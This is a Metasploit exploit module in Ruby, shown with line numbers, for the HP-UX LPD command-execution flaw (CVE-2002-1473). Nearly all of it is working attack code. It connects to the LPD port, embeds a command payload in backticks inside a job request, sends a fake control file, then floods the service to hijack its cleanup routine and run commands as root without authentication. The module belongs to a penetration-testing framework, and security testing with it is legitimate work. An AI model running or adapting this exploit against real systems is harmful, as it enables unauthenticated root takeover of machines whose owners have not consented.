Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'HP-UX LPD Command Execution',
14
      'Description'    => %q{
15
          This exploit abuses an unpublished vulnerability in the
16
        HP-UX LPD service. This flaw allows an unauthenticated
17
        attacker to execute arbitrary commands with the privileges
18
        of the root user. The LPD service is only exploitable when
19
        the address of the attacking system can be resolved by the
20
        target. This vulnerability was silently patched with the
21
        buffer overflow flaws addressed in HP Security Bulletin
22
        HPSBUX0208-213.
23
      },
24
      'Author'         => [ 'hdm' ],
25
      'References'     =>
26
        [
27
          [ 'CVE', '2002-1473'],
28
          [ 'OSVDB', '9638'],
29
          [ 'URL', 'http://archives.neohapsis.com/archives/hp/2002-q3/0064.html'],
30

31
        ],
32
      'Platform'       => %w{ hpux unix },
33
      'Arch'           => ARCH_CMD,
34
      'Payload'        =>
35
        {
36
          'Space'       => 200,
37
          'DisableNops' => true,
38
          'BadChars'    => "\x00\x09\x20\x2f",
39
          'Compat'      =>
40
            {
41
              'PayloadType' => 'cmd',
42
              'RequiredCmd' => 'generic perl telnet',
43
            }
44
        },
45
      'Targets'        =>
46
        [
47
          [ 'Automatic Target', { }]
48
        ],
49
      'DefaultTarget'  => 0,
50
      'DisclosureDate' => '2002-08-28'
51
    ))
52

53
    register_options(
54
      [
55
        Opt::RPORT(515)
56
      ])
57
  end
58

59
  def exploit
60

61
    # The job ID is squashed down to three decimal digits
62
    jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]
63

64
    # Connect to the LPD service
65
    connect
66

67
    print_status("Sending our job request with embedded command string...")
68
    # Send the job request with the encoded command
69
    sock.put(
70
      "\x02" + rand_text_alphanumeric(3) + jid +
71
      "`" + payload.encoded + "`\n"
72
    )
73

74
    res = sock.get_once(1)
75
    if !(res and res[0,1] == "\x00")
76
      print_status("The target did not accept our job request")
77
      return
78
    end
79

80
    print_status("Sending our fake control file...")
81
    sock.put("\x02 32 cfA" + rand_text_alphanumeric(8) + "\n")
82
    res = sock.get_once(1)
83
    if !(res and res[0,1] == "\x00")
84
      print_status("The target did not accept our control file")
85
      return
86
    end
87

88
    print_status("Forcing an error and hijacking the cleanup routine...")
89

90
    begin
91
      sock.put(rand_text_alphanumeric(16384))
92
      disconnect
93
    rescue
94
    end
95

96
  end
97
end
98

99